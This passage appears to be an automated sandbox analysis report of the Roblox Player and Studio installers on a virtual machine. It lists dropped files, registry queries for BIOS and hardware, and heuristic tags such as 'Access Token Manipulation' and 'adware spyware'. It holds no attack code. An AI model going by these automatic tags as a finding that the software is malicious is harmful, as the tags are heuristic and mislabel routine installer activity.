N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\ui\InspectMenu\[email protected] C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Light\Standard\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Light\Standard\LocalFile.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\roblox_networking-chat\networking-chat\networkRequests\createSendGameLinkMessage.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\UGCValidation\UGCValidation\util\BundlesMetadata.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\AnimationEditor\FaceCaptureUI\CloseButton.png C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\TerrainEditor\Light\Standard\Locked.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\NextDataExpirationTimeRodux\Dev\JestGlobals.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\ui\Controls\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\PurchasePrompt\Components\Connection\LayoutValuesContext.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\DevConsole\Components\DebugVisualizations\DebugVisualizationsChart.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\InGameMenu\Components\Pages\Dialog\LeavePrompt.spec.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\ExtraContent\textures\ui\Controls\DesignSystem\[email protected] C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\GameDetailRodux\Http.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\DeveloperFramework\StudioTheme\clear.png C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\ui\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Scripting\Light\Standard\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\ui\Controls\DesignSystem\[email protected] C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Dark\Standard\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\PurchasePrompt\Test\MockExternalSettings.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\TerrainEditor\Light\Large\Fill.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Light\Standard\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Light\Standard\TerrainDetail.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\JestConfig\JestConfig\constants.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\RoduxPresence-50d7e209-c2fcb3b0\RoduxPresence\Models\PresenceModel.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\resources.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\CompositorDebugger\blend2d.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\ui\Controls\PlayStationController\DPadUp.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\ImportPreview\Light\Large\CameraReset.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Dark\Medium\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Light\Standard\RibbonUpdateSmall.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\AppChat\Analytics.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Dark\Standard\SwimController.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\PurchasePrompt\Flags\GetFFlagEnablePromptPurchaseRequestedV2Take2.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\llama\llama\Dictionary\some.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\DeveloperStorybook\ToolbarIcon.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\textures\ui\LuaApp\graphic\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\ToastNotification\RobloxAppHooks.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Dark\Medium\RibbonTextButton.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\WidgetIcons\Light\Large\AccessoryFittingTool.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\JestUtil-3.8.0\JestUtil\replacePathSepForGlob.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\Merge\Merge\typedefs-mergers\merge-nodes.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\UserSafetyTestSuite\UserSafetyTestSuite\default.rbxp C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\CoreScripts\PlayerBillboards.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Dark\Medium\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\DomTestingLibrary\DomTestingLibrary\queries\init.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\particles\fire_main.dds C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\Terrain\Dark\Large\TerrainBrushTypeCylinder.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\Terrain\Light\Large\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\LuauPolyfill-1.2.3\LuauPolyfill\Error\Error.global.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\PlayerList\Components\Connection\LayoutValuesContext.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\roblox_lumberyak\lumberyak\example\app\appLogger.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\InvisibleMode\Dev\SocialTestHelpers.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\TenFootUiTesting\RoactNavigation.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\UGCValidation\UGCValidation\Constants.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\loading\robloxlogo.png C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\JestEach-3.8.0\JestEach\nilPlaceholder.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\GameTile\Dev\JestGlobals.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\Debugger\Breakpoints\[email protected] C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\ui\Controls\XboxController\[email protected] C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\WidgetIcons\Light\Large\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\SocialLibraries\SocialLibraries\temp\User.lua C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\StudioSharedUI\alert_error_withbg.png C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Dark\Standard\[email protected] C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\LaunchWinApp.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\GamePanel.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\GamePanel.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\System32\GamePanel.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\System32\GamePanel.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
